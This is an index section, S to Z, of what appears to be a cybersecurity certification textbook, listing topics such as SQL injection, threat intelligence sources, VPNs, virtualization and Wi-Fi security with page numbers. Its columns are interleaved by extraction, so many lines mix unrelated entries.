S/MIME (Secure Multipart Internet tailgating, 76 SOPs (standard operating
Message Extensions), 134 typosquatting, 79 procedures), 182, 194
SMiShing, 78 vishing, 77-78 source IP affinity, 250
SMS (Short Message Service), 170 watering hole attack, 79 source routing vulnerabilities, 233
SMS (simple message service), 78 whaling, 77-78 SOX. see Sarbanes-Oxley Act (SOX)
SMTPS, 296 social media spam, 78-79, 86-87
Smurf, 248 analysis, 208 Spamhaus, open source
Sn1per, exploitation as attack vectors, 23 intelligence (OSINT), 28
frameworks, 46 threat research sources, 28 SPAN (switched port analyzer),
snapshot, 495 social proof, 75 42, 269-270
snapshot backups, 525-526 Social Security Number (SSN), 441 Spanning Tree Protocol (STP), 228
sniffing, test access port (TAP), 42 soft power, 82 spear phishing, 78
SNMP (Simple Network software as a service (SaaS), 409 specialized systems
Management Protocol), 38, 275, software compliance and facility automation, 336-337
289-290 licensing threat, 502 medical devices, 338
Snort, 268-269 software-defined networking multifunction printers
snowflake systems, 431 (SDN), 431-432 (MFPs), 337
SOAP (Simple Object Access software-defined visibility vehicles and drones, 338
Protocol), 204-205 (SDV), 432 Voice over IP (VoIP), 337


Special Publications (NIST), 11 transport layer (OSI Layer 4), subscription services, 295
spectrum analyzer, 245 257-258 substitution cipher, 98
split tunnel, VPN client state laws, 14 superuser account
configuration, 309 stateless operations, 256 identity and account
spoofed routing information stateless protocol, 374 management controls,
(route injections) vulnerabilities, Statements on Standards for 184-185
233 Attestation Engagements (SSAE), weak host configurations, 51
spyware, 85 11-12 supervisory control and data
SQL injection attacks, 377-378 states of data acquisition (SCADA), 334-335
SRTP (secure transport data at rest, 447 supplicant, 166
protocol), 299 data in processing, 447-448 supply chain, as attack vectors, 23
SSAE. see Statements on data in transit (motion), 447 supply chain assessment, third-
Standards for Attestation data in use, 447 party risks, 54-55
Engagements (SSAE) state table, 257 Suricata, 268
SSH. see Secure Shell (SSH) static acquisition, 493 surveillance systems, 336-337,
SSH client authentication, 312 static and dynamic source 544-545
SSH commands, 313 NAT, 264 suspended certificates, 138-139
SSH FTP (SFTP), 296 static code analysis, 387 SWG (secure web gateway), 272
SSID (service set identifier), 235 static known threats, 19 switched port analyzer (SPAN),
SSL (Secure Sockets Layer), 292 statistical deviation analysis, 468 42, 269-270
SSL VPN, 303-304 steganography, 121-122 switches, 217, 469, 518
SSO (single sign-on), 155, 295 STIGs, 12 Symantec
SSRF. see server-side request Stingray/International Mobile Blue Coat, 426
forgery (SSRF) Subscriber Identity (IMSI) data loss prevention (DLP), 450
SSTP (Secure Sockets Tunneling catcher, 361 Symantec/Broadcom, 345
Protocol), 304 storage area networks (SANs), symmetric cipher, 112
stack overflow, 367 520, 527 symmetric encryption
Staged Payloads, 347 storage profiles, 421 Advanced Encryption
staging, development storage segmentation, 353 Standard (AES), 100
environments, 400 stored procedures, 386 block ciphers, 100
stakeholder management, STP (Spanning Tree Protocol), 228 bulk encryption, 105-106
incident response (IR), 458 strategic intelligence, 487-488 cryptographic concepts, 96
standalone intrusion stratum 1 (Top-Level NTP defined, 99
mechanism, 87 servers), 289 digital envelopes, 105-106
standard naming conventions, stream ciphers, 100 initialization vector (IV), 100
531 stress testing, 387-388 key Exchange, 105-106
standard operating procedures structured exception handler key length, 100
(SOPs), 182, 194 (SEH), 385 secret key, 99
standards, 13-14 structured query language (SQL) stream ciphers, 100
standard users, 183 injection attacks, 377-378 synchronous replication, 520
stapling, 140 structured threat information SYN flood attacks, 247
Start-Process, 395 eXpression (STIX) Sysinternals, 90-91
STARTTLS, 288, 296 OASIS CTI framework, 29-30 syslog, 468
state actors, 20-21, 21 Trusted Automated syslog-ng, 468-469
stateful inspection firewalls eXchange of Indicator system accounts, 185
application aware firewalls, Information (TAXII), 30 system and security logs, 469
258 structured threats, 19 system-enforced account
application layer (OSI subject alternative name (SAN), policies, 192-193
Layer 7), 258 digital certificates, 130-131 system integration, third-party
iptables, 258-259 subject name attributes, 130-131 risks, 54
state table, 257 subscriber identity module system memory acquisition
(SIM), 333 crash dump, 492


hibernation file, 492-493 theHarvester, network behavioral threat research, 26


live acquisition, 492 reconnaissance tools, 41 closed/proprietary, 26-27
pagefile, 492-493 The Onion Router (TOR), dark guidelines for, 33
system memory dump, 471 net, 25, 26 Information Sharing and
System Monitor, 91 thin clients, 412-413 Analysis Centers (ISACs), 27
system on chip (SoC), 332 third-party app stores, 353 open source intelligence
third-party library, 386 (OSINT)
T third-party risks AT&T Security, 27
cloud-based versus Malware Information
tabletop exercises, 461-462, 512
on-premises risks, 55 Sharing Project (MISP), 27
TACACS+ (terminal access
data storage, 55 Spamhaus, 28
controller access-control
management of, 322 VirusTotal, 28
system), 167
outsource code reputational threat
tactics, techniques, and
development, 55 intelligence, 26
procedures (TTP)
vendor management, 54 threat data feeds, 26
of cyber adversaries, 25, 459
vulnerability types, 53-54 vendor websites, 27
MITRE ATT&CK, 460-461
threat actors threat intelligence sources
threat intelligence sources, 28
attack surface of, 22-23 artificial intelligence (AI), 31
tail commands, 278
attributes of guidelines for, 33
tailgating, 76, 543
capability and resources indicator of compromise
tangible assets, 510
of, 19 (IoC), 28-29
TAP (test access port), 42, 269-270
external threat, 19 providers, 26-28
Target data breach, 23
funding, 19 research sources, 25-26, 28
targeted threats, 19
intent/motivation, 19 tactics, techniques, and
TCP (Transport Control
internal threat, 19 procedures (TTP), 28
Protocol), 52
sophistication level, 19 threat data feeds, 29-30
TCP ACK packet, 38
threat analytics platform, threat maps, threat data feeds, 30
TCP three-way handshake, 257
intelligence fusion, 64-65 threat research sources
TCP/UDP ports, nslookup/dig,
threat assessments, security academic journals, 28
40-41
assessment, 18 conferences, 28
Teamviewer, 310
threat data feeds dark net, 25-26
technical security controls, 8
threat hunting, 64-65 dark web, 25-26
technology diversity, 533-534
threat intelligence Request for Comments
temperature sensors, 550
providers, 26 (RFC), 28
Temporal Key Integrity Protocol
threat intelligence sources social media, 28
(TKIP), 237
Automated Indicator threats, identifying, 500
Tenable Nessus, 58
Service (AIS), 30 three-way handshake, 158
Tenable Network Security,
file/code repositories, 30 Ticket Granting Service, Kerberos
Nessus, 42
structured threat authentication, 155-156
terminal access controller
information eXpression time-based login policy, 193-194
access-control system
(STIX), 29-30 Time-Based One-Time Password
(TACACS+), 167
threat maps, 30 Algorith (TOTP), 169
territory laws, 14
vulnerability databases time-based restrictions
terrorist group, influence
and feeds, 30 impossible travel time/risky
campaigns, 82
threat hunting login policy, 194
test access port (TAP)
advisories and bulletins, 64 time-based login policy,
passive and active, 269-270
intelligence fusion, 64-65 193-194
sniffing with, 42
maneuver, 65 time of day policy, 193
test/integration, development
threat data feeds, 64-65 timelines, 486-487, 494
environments, 400
vulnerability scanning time of check to time of use
tethering connection methods,
techniques, 64-65 (TOCTTOU), 368
357-358
threat intelligence providers time of day policy, 193


time offset, 486 transit gateways, 424 true random number generator
time synchronization, 289 transparent proxy, 261-262 (TRNG), 114-115
timing attack, 414 Transport Control Protocol (TCP), trust anchor, 318-319
TKIP (Temporal Key Integrity weak network configurations, 52 Trusted Automated eXchange of
Protocol), 237 transport encryption (data-in- Indicator Information (TAXII), 30
TLDs (Top Level Domains), 287 transit), 112 Trusted Computing Group
TLS. see Transport Layer Security transport layer (layer 4), 425 (TCG), 321
(TLS) transport layer (OSI Layer 4), Trusted Platform Module (TPM),
TLS VPN, 303-304 257-258 164-165
token-based key card lock, 542 Transport Layer Security (TLS) trusted platform module (TPM),
tokenization, database application log files, 471 180, 318-319
deidentification methods, 452 cipher suites, 108, 293 trust model, 127
token keys and static codes, secure application protocols, TTP. see tactics, techniques, and
167-168 292-294 procedures (TTP)
tokens, 180 secure wireless tunnel, 301
tombstone, 450 infrastructure, 241-242 tunnel mode, 306
Top Level Domains (TLDs), Key SSL/TLS versions, 293-294 turnstile, 543
Signing Key, 287 Transport Layer Security (TLS) VPN two-factor authentication (2FA),
Top-Level NTP servers Open VPN, 303-304 151, 170
(stratum 1), 289 Point-to-Point Protocol two-person integrity/control, 546
topologies, demilitarized zone (PPP), 304 two-step verification, 170
(DMZ) Point-to-Point Tunneling typosquatting, 79
screened hosts, 223 Protocol (PPTP), 303
screened subnet, 222
triple-homed firewall, 222-223
Secure Sockets Tunneling U
Protocol (SSTP), 304
topology discovery U2F (Universal Second
SSL VPN, 303-304
(footprinting), 36-37 Factor), 168
transport mode, 306
TOR (The Onion Router), 25, 26 UAC (user account control),
transposition cipher, 98
TOTP (Time-Based One-Time 201-202
trapdoor function, 101
Password Algorithm), 169 UAV (drones/unmanned aerial
threat actors, types of
TPM (Trusted Platform Module), vehicle), 69-70
advanced persistent threats,
164-165 Ubuntu Linux
20-21, 21
TPM (trusted platform RedHat Linux container,
competitors, 21
module), 180 413-414
criminal syndicates, 21
traceroute root accounts, 185
guidelines for, 33
network reconnaissance User Datagram Protocol (UDP)
hackers, 20
tools, 37 transport layer (OSI Layer 4),
hacker teams, 20
packet injection and 257
hacktivists, 20
replay, 44-45 weak network configurations,
tracert, network reconnaissance insider threats, 21-22
52
tools, 37 nation state actors, 21
UEBA. see user and entity
traffic analysis, 43-44 script kiddies, 20
behavior analytics (UEBA)
training/policies, onboarding state actors, 20-21, 21
UEM. see unified endpoint
policies, 181 threat intelligence, 459-460
management (UEM)
training technique diversity trend analysis, 468
unauthorized requests, 381
capture the flag (CTF), triple-homed firewall, 222-223
unformatted error messages,
210-211 TRNG. see true random number
weak network configurations, 53
computer-based training and generator (TRNG)
unified endpoint management
gamification, 211 TRNG (true random number
(UEM), 345
phishing campaigns, 210 generator), 114-115
unified extensible firmware
Transient Electromagnetic Trojans
interface (UEFI), 319
Pulse Emanation Standard defined, 82, 83
uniform resource locator (URL)
(TEMPEST), 550 static known threats, 19


hypertext transfer protocol vendor management, 54 public and private


secure (HTTPS), 292 vendor-specific guides, secure subnets, 423
redirection, 286 configuration guides, 12-13 transit gateways, 424
uniform resource locator (URL) vendor websites, threat virtual private network (VPN)
analysis intelligence providers, 27 cloud networking security, 423
HTTP methods, 372-373 version control, 401 HTML5 VPN, 310
percent encoding, 373 vertical (sector-specific) penetration testing, 70
unintentional threat, 18 legislation, 13-14 remote access architecture,
uninterruptible power supplies vertical privilege escalation, 366 301-302
(UPSs), 517 video interviews, 486 secure network protocols, 292
unit tests, 390 video surveillance, 336-337 site-to-site model, 302
Universal Second Factor virtual appliance virtual viruses
(U2F), 168 firewalls, 265 boot virus, 83
unreachable code, 386 virtual desktop environment defined, 82, 83
unsecured root accounts, weak (VDE), 413 macro virus, 83
host configurations, 51-52 virtual desktop infrastructure memory resident virus, 83
unsecure protocols (VDI), 344, 412-413 multipartite, 83
dangers of, 284 virtual firewalls, 265 non-resident/file infector, 83
weak network configurations, virtualization technologies polymorphic, 83
52 application virtualization, script virus, 83
update (read/write access), 288 413-414 static known threats, 19
URL (uniform resource locator), components of VirusTotal, open source
286, 292 guest operating systems, intelligence (OSINT), 28, 30
usage audits, 195-196 411 vishing, 77-78
USB connection methods, 360 host hardware, 411 visibility, 432
USB data blocker, 543 hypervisor/virtual visitor logs, 546
USB key, 164 machine monitor Visual Basic for Applications
USB security, 321-322, 543 (VMM), 411 (VBA), 396-397
user account control (UAC), Virtual Machines (VM), 411 visualization tools, netflow/
201-202 container virtualization, IPFIX, 473
user accounts, security identifier 413-414 VLAN (virtual LANs), 217-218
(SID), 191 thin clients, 412-413 VM escaping protection, 414-415
user-agent field, 470 virtual desktop environment VM sprawl avoidance, 415-416
user-agent string, 470 (VDE), 413 VMware
user and entity behavior virtual desktop infrastructure ESXi Server, 412
analytics (UEBA), 90, 271, (VDI), 412-413 ThinApp, 413-414
277-278, 479 VM escaping protection, Workstation, 411
user and role-based training, 414-415 VNC (Virtual Network
209-210 VM sprawl avoidance, 415-416 Computing), 310
user traffic, 272 virtual LANs (VLAN), 217-218 voice and video services
user training, 533 virtual machine life cycle Real-Time Transport Protocol
UTC (Coordinated Universal management (VMLM), 416 (RTP), 298-299
Time), 289 Virtual Machines (VM) secure transport protocol
geographical redundancy, 520 (SRTP), 299
V infrastructure of, 411-413 Session Initiation Protocol
VM escaping protection, (SIP), 298-299
variables, Python, 391
414-415 Voice over IP (VoIP), 298-299
vascular biometrics, 173
VM sprawl avoidance, 415-416 voice over IP (VoIP)
vaults, secure areas, 549
Virtual Network Computing specialized systems, 337
vehicles and drones, 338
(VNC), 310 traffic managers, 471
vein matching scanners, 173
virtual private cloud (VPC) voice and video services,
vendor diversity, 534
endpoints, 424 298-299


voice recognition, 175, 348 W web application firewalls,


Volatility Framework, 491, 273, 425
W3C extended log file format,
492, 492 web application scanners, 59
470
volume-based trend analysis, web application security
W3 Schools, 373
468 response headers, 384-385
walkthrough exercises, 462, 512
Volume Purchase Program, 345 secure cookies, 384
WAN, 216
Volume Shadow Copy Service web feed, 295
WAP (wireless access point)
(VSS), 525-526 web/HTTP access logs, 470
placement, 235
VPCs and transit gateways, 424 web metadata, 471
WAP (wireless access points), 23,
VPN. see virtual private network web server applications, 13
217-218
(VPN) web server certificate types,
war driving, 69
VPN client configuration 132-133
warm site, 533
Always-on VPN, 308-309 WEP (wired equivalent
waterfall model software
full tunnel, 309 privacy), 237
development life cycle (SDLC),
split tunnel, 309 whaling, 77-78
400, 401-403
vulnerability assessments WhatsApp, 360, 458
watering hole attack, 79
defined, 57 white box, 68
weak encryption, 52-53
risk management, 500 white box cryptography, 113
weak host configurations, 51-52
security assessment, 18 white hat hacker, 20
weak key, 114-115
vulnerability databases and white team, penetration testing,
weak network configurations,
feeds, 30 68-69
52-53
vulnerability feed, 59 Wi-Fi authentication methods,
weaponization, 460
vulnerability scanning 238
wearables, 335
techniques Wi-Fi connection methods,
wearable technology, 359
application and web 357-358
web, as attack vectors, 23
application scanners, 59 Wi-Fi direct, 357
web application attacks
configuration review, 63 Wi-Fi Pineapple, 69
application programming
credentialed vs. non- Wi-Fi protected access (WPA),
interfaces (APIs) attacks, 374
credentialed scanning, 61 117, 237-238, 357
canonicalization attack, 379
false positives, false Wi-Fi protected access (WPA2),
command injection attack,
negatives, log reviews, 61-62 237-238
379
intrusive vs. non-intrusive, 60 Wi-Fi protected access (WPA3),
cross-site scripting (XSS)
network vulnerability 238-239
attacks, 376-377
scanner, 58 Wi-Fi protected setup (WPS), 239
directory traversal injection
threat hunting, 64-65 Wi-Fi tethering, 357-358
attack, 379
vulnerability scan outputs, 470 WikiLeaks, 20
extensible markup language
vulnerability types Windows
(XML) injection, 378
impact of, 53-54 Active Directory Certificate
Lightweight Directory Access
kernel vulnerabilities, 50-51 Services, 141
Protocol (LDAP) injection, 379
legacy platform administrator accounts,
replay attacks, 374-375
vulnerabilities, 51 184-185
server-side request forgery
patch management, 50-51 AppLocker, 394
(SSRF), 380-389
software vulnerabilities, authentication process
session hijacking, 375-376
50-51 Local Security Authority
structured query language
third-party risks, 54-55 (LSA), 154
(SQL) injection attacks,
weak host configurations, NT LAN Manager (NTLM)
377-378
51-52 authentication, 154
uniform resource locator
weak network configurations, remote sign-in, 154
(URL) analysis, 372-373
52-53 Security Accounts
XML External Entity
zero-day vulnerability, 51 Manager (SAM), 154
attack, 378
single sign-on (SSO), 155


Certificate Services, 139 as attack vectors, 23 X


Defender Application Control network appliances, 217-218
XCCDF (Extensible Configuration
(WDAC), 394 placement, 235
Checklist Description Format), 63
file integrity monitoring wireless controllers, 236-237
XML External Entity attack, 378
(FIM), 272 wireless network installation
XML injection attacks, 295, 378
File Sharing/Server Message considerations
X-Ways, 491
Block (SMB), 369 site survey and heat
FireEye, 21, 27, 41, 492 maps, 236
F-Response TACTICAL, 492 wireless access point (WAP) Z
ipconfig, 36 placement, 235 Zed Attack Proxy (ZAP)
Memoryze, 492 Wireshark, 43-44, 294 exploitation frameworks, 46
Netcat, 46-47 witness interviews, 486 web server applications, 13
nslookup, 41 work recovery time (WRT), 509 Zeek Network Monitor (Bro),
pathping, 37 worms 60, 268
PowerShell script Code Red worm, 84 zero-day exploits, 369
environment, 392-393 Conficker worm, 84 zero-day vulnerability, 51
Python, 392 defined, 82, 84-85 zero filling, 554
Software Restriction Policies WPA (Wi-Fi protected access), zero trust, 224-225
(SRP), 394 117, 237-238 Zigbee, 333-334, 335
tracert, 37 WPA2 (Wi-Fi protected access), zone networks, 220, 422-423
WinHex, 491, 492 237-238 zone-redundant storage, 422
WinRM, 311 WPA3 (Wi-Fi protected access), Z-Wave, 333-334, 335
WinRS, 311 238-239
wired equivalent privacy WPS (Wi-Fi protected setup), 239
(WEP), 237 wrappers, 339
wireless access points (WAP)
